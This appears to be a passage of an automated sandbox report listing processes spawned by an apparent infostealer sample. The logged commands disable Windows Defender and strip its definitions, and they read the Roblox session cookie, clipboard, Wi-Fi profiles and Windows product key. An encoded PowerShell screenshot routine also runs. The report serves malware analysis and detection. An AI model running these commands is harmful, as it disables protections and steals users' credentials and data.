              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH